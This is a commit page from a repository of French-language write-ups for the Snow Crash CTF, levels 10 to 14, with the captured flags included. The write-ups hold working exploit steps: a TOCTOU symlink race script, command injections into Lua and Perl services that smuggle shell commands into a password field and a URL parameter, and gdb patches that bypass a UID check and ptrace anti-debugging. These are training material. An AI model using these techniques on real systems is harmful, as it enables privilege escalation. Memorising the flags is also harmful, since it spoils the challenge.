rparodi/snow-crash
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge branch 'rparodi'

Browse source
This commit is contained in:
Raphael 2026-01-28 03:42:24 +01:00
commit 15d5fa9b9e
No known key found for this signature in database
11 changed files with 378 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

70
level10/README.md Normal file
View file

@ -0,0 +1,70 @@
Lors de mon arriver sur le level10 je remarque 2 fichier dans mon home
```bash
ls -l
total 16
-rwsr-sr-x+ 1 flag10 level10 10817 Mar 5 2016 level10
-rw------- 1 flag10 flag10 26 Mar 5 2016 token
```
level10 est un executable qui prends 2 arguments
```bash
./level10
./level10 file host
sends file to host if you have access to it
```
Bien sur token n'est pas lisible par le programme
```c
ltrace ./level10 ./token
__libc_start_main(0x80486d4, 2, 0xbffff7e4, 0x8048970, 0x80489e0 <unfinished ...>
printf("%s file host\n\tsends file to ho"..., "./level10"./level10 file host
sends file to host if you have access to it
) = 65
exit(1 <unfinished ...>
+++ exited (status 1) +++
```
Je tente de faire un autre fichier /tmp/test et de lancer le programme avec
```bash
echo 'test' > /tmp/test
level10@SnowCrash:~$ ltrace ./level10 /tmp/test 127.0.0.1
__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0 <unfinished ...>
access("/tmp/test", 4) = 0
printf("Connecting to %s:6969 .. ", "127.0.0.1") = 32
fflush(0xb7fd1a20Connecting to 127.0.0.1:6969 .. ) = 0
socket(2, 1, 0) = 3
inet_addr("127.0.0.1") = 0x0100007f
htons(6969, 1, 0, 0, 0) = 14619
connect(3, 0xbffff71c, 16, 0, 0) = 0
write(3, ".*( )*.\n", 8) = 8
printf("Connected!\nSending file .. "Connected!
) = 27
fflush(0xb7fd1a20Sending file .. ) = 0
open("/tmp/test", 0, 010) = 4
read(4, "test\n", 4096) = 5
write(3, "test\n", 5) = 5
puts("wrote file!"wrote file!
) = 12
+++ exited (status 12) +++
```
Il essaye donc l'envoyer un fichier sur le 6969, effectivement lors de la l'ecoute du port avec netcat
```bash
nc -lv 6969
Connection from 127.0.0.1 port 6969 [tcp/*] accepted
.*( )*.
test
```
Le programme semble s'arreter a access lorsque il n'est pas possible de lire le fichier
Mais access est vulnerable a TOUCTOU (Time-Of-Check to Time-Of-Use)
Je vais donc faire un script en bash pour effectuer l'exploit
```bash
Connection from 127.0.0.1 port 6969 [tcp/*] accepted
.*( )*.
woupa2yuojeeaaed06riuj63c
```
au bout de 30s le flag tombe

1
level10/flag Normal file
View file

@ -0,0 +1 @@
feulo4b72j7edeahuete3no7c

17
level10/ressources/toctou.sh Normal file
View file

@ -0,0 +1,17 @@
#!/bin/env bash
INPUT="/home/user/level10/token"
OUTPUT="/tmp/toctou"
PROGRAM="/home/user/level10/level10"
touch $OUTPUT
while true; do $PROGRAM $OUTPUT 127.0.0.1; done &
while ! test -r $OUTPUT; do
rm -f $OUTPUT
touch $OUTPUT
rm -rf $OUTPUT
ln -s $INPUT $OUTPUT
done

68
level11/README.md Normal file
View file

@ -0,0 +1,68 @@
Lors de mon arriver sur le level 11 je remarque un fichier lua lisble
```bash
ls -l
total 4
-rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua
```
Je l'ouvre pour regarder le contenue
```lua
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))
function hash(pass)
prog = io.popen("echo "..pass.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
end
while 1 do
local client = server:accept()
client:send("Password: ")
client:settimeout(60)
local l, err = client:receive()
if not err then
print("trying " .. l)
local h = hash(l)
if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
client:send("Erf nope..\n");
else
client:send("Gz you dumb*\n")
end
end
client:close()
end
```
Le hash a ete decode via [CrashStation](https://crackstation.net/) et donne en sha1 NotSoEasy
Ce n'est donc pas la reponse mais il fallait bien tenter
Lors de la lecture du script nous pouvons voir que le port 5151 est ouvert et donc nous pouvons essayer de le lancer avec un netcat en ecoute de ce dernier
Lorsqu'il est en ecoute il demande un password
```bash
nc localhost 5151
Password:
```
mais le hash est calculer en effectuant une commande `echo $args | sha1sum` (traduit en shell)
nous pouvons donc executer une commande sur cette derniere mais le resultat ne nous sera pas afficher car pas envoyer au client mais nous pouvons la lancer directement pour rediriger dans un fichier
```bash
nc localhost 5151
Password: $(getflag > /tmp/level11)
Erf nope...
cat /tmp/level11
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
```

1
level11/flag Normal file
View file

@ -0,0 +1 @@
fa6v5ateaw21peobuub8ipe6s

51
level12/README.md Normal file
View file

@ -0,0 +1,51 @@
Lors de mon arriver sur le level12 je remarque un fichier lisible avec un script perl
```bash
ls -l
total 4
-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl
```
Ce sciprt prends 2 entree utilisateur (x, y) et transforme x a l'aide de la commande egrep
```perl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
$nn = $_[1];
$xx = $_[0];
$xx =~ tr/a-z/A-Z/;
$xx =~ s/\s.*//;
@output = `egrep "^$xx" /tmp/xd 2>&1`;
foreach $line (@output) {
($f, $s) = split(/:/, $line);
if($s =~ $nn) {
return 1;
}
}
return 0;
}
sub n {
if($_[0] == 1) {
print("..");
} else {
print(".");
}
}
n(t(param("x"), param("y")));
```
L'exploit est donc assez simple il suffit de mettre la commande souhaiter dans un fichier avec un nom en majuscule (a cause du tr) et elle sera executer
```bash
echo "getflag > /tmp/pass" > /tmp/LEVEL
mv /tmp/level /tmp/LEVEL
curl 'localhost:4646?x=`/*/LEVEL`'
cat /tmp/pass
Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
```

1
level12/flag Normal file
View file

@ -0,0 +1 @@
g1qKMiRpXf53AWhDaU7FEkczr

88
level13/README.md Normal file
View file

@ -0,0 +1,88 @@
Lors de l'arriver sur le level13 je remarque le fichier level13
```bash
ls -l level13
-rwsr-sr-x 1 flag13 level13 7303 Aug 30 2015 level13
```
Et je remarque egallement que c'est du C
```c
ltrace ./level13
__libc_start_main(0x804858c, 1, 0xbffff7f4, 0x80485f0, 0x8048660 <unfinished ...>
getuid() = 2013
getuid() = 2013
printf("UID %d started us but we we expe"..., 2013UID 2013 started us but we we expect 4242
) = 42
exit(1 <unfinished ...>
+++ exited (status 1) +++
```
en le lancant (plus proprement), il attente l'UID 4242
```bash
level13@SnowCrash:~$ ./level13
UID 2013 started us but we we expect 4242
```
Voici le code de la fonction main
```asm
0804858c <main>:
804858c: 55 push ebp
804858d: 89 e5 mov ebp,esp
804858f: 83 e4 f0 and esp,0xfffffff0
8048592: 83 ec 10 sub esp,0x10
8048595: e8 e6 fd ff ff call 8048380 <getuid@plt>
804859a: 3d 92 10 00 00 cmp eax,0x1092
804859f: 74 2a je 80485cb <main+0x3f>
80485a1: e8 da fd ff ff call 8048380 <getuid@plt>
80485a6: ba c8 86 04 08 mov edx,0x80486c8
80485ab: c7 44 24 08 92 10 00 mov DWORD PTR [esp+0x8],0x1092
80485b2: 00
80485b3: 89 44 24 04 mov DWORD PTR [esp+0x4],eax
80485b7: 89 14 24 mov DWORD PTR [esp],edx
80485ba: e8 a1 fd ff ff call 8048360 <printf@plt>
80485bf: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1
80485c6: e8 d5 fd ff ff call 80483a0 <exit@plt>
80485cb: c7 04 24 ef 86 04 08 mov DWORD PTR [esp],0x80486ef
80485d2: e8 9d fe ff ff call 8048474 <ft_des>
80485d7: ba 09 87 04 08 mov edx,0x8048709
80485dc: 89 44 24 04 mov DWORD PTR [esp+0x4],eax
80485e0: 89 14 24 mov DWORD PTR [esp],edx
80485e3: e8 78 fd ff ff call 8048360 <printf@plt>
80485e8: c9 leave
80485e9: c3 ret
80485ea: 90 nop
80485eb: 90 nop
80485ec: 90 nop
80485ed: 90 nop
80485ee: 90 nop
80485ef: 90 nop
```
Notamment cette ligne (7) qui vas nous interesser
```asm
804859a: cmp eax,0x1092
```
0x1092 = 0d4242
il suffit de changer la valeur de notre uid lors de la comparaison (a l'aide de gdb)
```asm
(gdb) b main
Breakpoint 1 at 0x804858f
(gdb) b *0x804859a
Breakpoint 2 at 0x804859a
(gdb) r
Starting program: /home/user/level13/level13
Breakpoint 1, 0x0804858f in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
Breakpoint 2, 0x0804859a in main ()
(gdb) set $eax=0x1092
(gdb) c
Continuing.
your token is 2A31L79asukciNyi8uppkEuSx
[Inferior 1 (process 2288) exited with code 050]
```

1
level13/flag Normal file
View file

@ -0,0 +1 @@
2A31L79asukciNyi8uppkEuSx

79
level14/README.md Normal file
View file

@ -0,0 +1,79 @@
Le repertoire de level14 est vide et aucun flag restant apparent... il ne reste plus qu'a regarder directement dans getflag :eyes:
(Pour etre honnete je souhaiter faire ca pour tous les flags mais j'ai ete spoiler que c'etait le dernier niveau)
En regardant le code ca ressemble a une foret de if else if
En passant par le main j'obtiens ce message
```asm
(gdb) b main
Breakpoint 1 at 0x804894a
(gdb) r
Starting program: /bin/getflag
Breakpoint 1, 0x0804894a in main ()
(gdb) c
Continuing.
You should not reverse this
[Inferior 1 (process 2506) exited with code 01]
```
c'est ptrace qui nous empeche de faire ce que nous souhaitons
```asm
8048989: e8 b2 fb ff ff call 8048540 <ptrace@plt>
804898e: 85 c0 test eax,eax
```
J'ai donc pu le bypass il suffit d'aller a ptrace puis de mettre eax a 0 (afin qu'il pense que c'est une execution classique)
```asm
gdb /bin/getflag
(gdb) b ptrace
Breakpoint 1 at 0x8048540
(gdb) r
Starting program: /bin/getflag
Breakpoint 1, 0xb7f146d0 in ptrace () from /lib/i386-linux-gnu/libc.so.6
(gdb) n
Single stepping until exit from function ptrace,
which has no line number information.
0x0804898e in main ()
(gdb) set $eax=0
(gdb) n
Single stepping until exit from function main,
which has no line number information.
Check flag.Here is your token :
Nope there is no token here for you sorry. Try again :)
```
Voici l'exploit complet avec le changement de la return value de getuid pour 3014 (soit d'apres /etc/passwd l'uid de flag14)
```asm
gdb /bin/getflag
(gdb) b ptrace
Breakpoint 1 at 0x8048540
(gdb) b getuid
Breakpoint 2 at 0x80484b0
(gdb) r
Starting program: /bin/getflag
Breakpoint 1, 0xb7f146d0 in ptrace () from /lib/i386-linux-gnu/libc.so.6
(gdb) n
Single stepping until exit from function ptrace,
which has no line number information.
0x0804898e in main ()
(gdb) set $eax=0
(gdb) n
Single stepping until exit from function main,
which has no line number information.
Breakpoint 2, 0xb7ee4cc0 in getuid () from /lib/i386-linux-gnu/libc.so.6
(gdb) n
Single stepping until exit from function getuid,
which has no line number information.
0x08048b02 in main ()
(gdb) set $eax=0xBC6
(gdb) n
Single stepping until exit from function main,
which has no line number information.
Check flag.Here is your token : 7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ
```

1
level14/flag Normal file
View file

@ -0,0 +1 @@
7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ